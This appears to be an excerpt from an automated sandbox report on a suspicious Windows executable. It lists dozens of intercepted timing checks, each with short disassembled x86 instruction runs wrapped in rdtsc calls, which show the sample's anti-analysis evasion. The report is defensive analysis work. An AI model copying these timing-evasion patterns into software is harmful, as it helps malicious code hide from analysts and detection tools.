0x0000007f push edx 0x00000080 push eax 0x00000081 push edx 0x00000082 jmp 00007FD358ED1106h 0x00000087 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EECFD1 second address: EECFD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EECFD7 second address: EECFE1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD358ED10FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EECFE1 second address: EED004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FD358DA46EAh 0x0000000f jmp 00007FD358DA46E4h 0x00000014 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EEE085 second address: EEE09C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358ED1103h 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EEF1A1 second address: EEF1BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push edx 0x00000009 jmp 00007FD358DA46E0h 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EF2562 second address: EF256A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EF256A second address: EF2570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EF68F9 second address: EF68FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EFAC7B second address: EFAC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 jng 00007FD358DA46E0h 0x0000000c jmp 00007FD358DA46DAh 0x00000011 pushad 0x00000012 jnc 00007FD358DA46D6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EFAC9A second address: EFACA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E8601C second address: E86022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E86022 second address: E86027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E86027 second address: E86031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E86031 second address: E86035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E86035 second address: E8605A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD358DA46E2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FD358DA46D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E8605A second address: E8605E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E8605E second address: E86064 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EFA39F second address: EFA3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD358ED10F6h 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EFA3A9 second address: EFA3B7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD358DA46D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EFA529 second address: EFA530 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EFA698 second address: EFA6A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD358DA46D6h 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EFA6A2 second address: EFA6A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EFA6A6 second address: EFA6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EFF9CE second address: EFF9F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007FD358ED1108h 0x00000010 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F0298C second address: F0299E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F0299E second address: F029A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F029A4 second address: F029A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F06C60 second address: F06C94 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD358ED1107h 0x00000008 pop edx 0x00000009 jo 00007FD358ED110Dh 0x0000000f jmp 00007FD358ED1101h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F071F5 second address: F07200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD358DA46D6h 0x0000000a pop esi 0x0000000b rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F074EA second address: F074F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F074F0 second address: F074F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F07AEE second address: F07AF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F07AF4 second address: F07AF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F07AF9 second address: F07B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD358ED1109h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD358ED1105h 0x00000011 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F0B2E7 second address: F0B2ED instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F14112 second address: F14128 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD358ED113Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007FD358ED10F6h 0x00000016 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F1447B second address: F14494 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46E4h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F14494 second address: F144A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD358ED10F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F13E14 second address: F13E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F14B6E second address: F14B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 jmp 00007FD358ED1103h 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FD358ED10F6h 0x00000016 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F14B92 second address: F14BBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD358DA46DAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FD358DA46DFh 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007FD358DA46D6h 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F14D25 second address: F14D29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F14D29 second address: F14D3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD358DA46DAh 0x0000000d rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F14D3B second address: F14D4D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD358ED10FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F14D4D second address: F14D51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F1898E second address: F189B3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD358ED10F6h 0x00000008 jmp 00007FD358ED1107h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F189B3 second address: F189BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD358DA46D6h 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EDF34A second address: EDF358 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EDF358 second address: EDF35C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EDF416 second address: EDF41A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EDF41A second address: EDF438 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD358DA46E6h 0x0000000d rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EDF438 second address: EDF43C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EDF9B1 second address: EDF9BB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD358DA46D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EDF9BB second address: EDFA74 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD358ED10FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FD358ED1109h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007FD358ED10FAh 0x00000019 mov eax, dword ptr [eax] 0x0000001b ja 00007FD358ED1100h 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 jmp 00007FD358ED1101h 0x0000002a pop eax 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007FD358ED10F8h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 call 00007FD358ED1105h 0x0000004a mov dword ptr [ebp+122D239Ch], edi 0x00000050 pop edi 0x00000051 mov dh, cl 0x00000053 push 9DA191B9h 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007FD358ED10FFh 0x0000005f rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE01BC second address: EE01C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE01C0 second address: EE01CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE01CE second address: EE01D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE01D2 second address: EE01D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE04D1 second address: EE04D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE04D8 second address: EE050C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD358ED10F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jns 00007FD358ED110Ah 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push edx 0x00000016 jbe 00007FD358ED10FCh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE050C second address: EE0518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov eax, dword ptr [eax] 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE0678 second address: EE0692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD358ED1103h 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F19220 second address: F19224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E91D11 second address: E91D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E91D19 second address: E91D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F1E2BC second address: F1E2C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD358ED10F6h 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F1E402 second address: F1E40C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F1EC6D second address: F1EC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F1EC73 second address: F1EC7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F1EC7C second address: F1ECA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED1106h 0x00000007 jmp 00007FD358ED10FBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F1EF70 second address: F1EF76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F1EF76 second address: F1EF7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F1F126 second address: F1F12E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F1F12E second address: F1F13C instructions: 0x00000000 rdtsc 0x00000002 je 00007FD358ED10F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F1DEB8 second address: F1DEC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F1DEC0 second address: F1DEC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F226AA second address: F226DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD358DA46DEh 0x0000000b jmp 00007FD358DA46E7h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007FD358DA46D6h 0x00000019 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F25220 second address: F2522A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD358ED1107h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F24D9F second address: F24DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD358DA46E8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F24DC3 second address: F24DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD358ED1108h 0x00000009 jmp 00007FD358ED1109h 0x0000000e popad 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F24DF9 second address: F24E0D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD358DA46DEh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F24E0D second address: F24E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F24F6D second address: F24F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F24F71 second address: F24F75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2BA97 second address: F2BAA1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD358DA46DEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2A59A second address: F2A5C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED1109h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FD358ED10FCh 0x00000014 jnp 00007FD358ED10F6h 0x0000001a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2A5C8 second address: F2A5E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46E8h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2A5E5 second address: F2A5EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2A891 second address: F2A8BC instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD358DA46E2h 0x00000008 jno 00007FD358DA46D6h 0x0000000e jp 00007FD358DA46D6h 0x00000014 push eax 0x00000015 jmp 00007FD358DA46E4h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2AA28 second address: F2AA38 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD358ED10F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2AA38 second address: F2AA3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2AA3C second address: F2AA74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED1109h 0x00000007 jmp 00007FD358ED1102h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jc 00007FD358ED10F6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2AA74 second address: F2AA7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
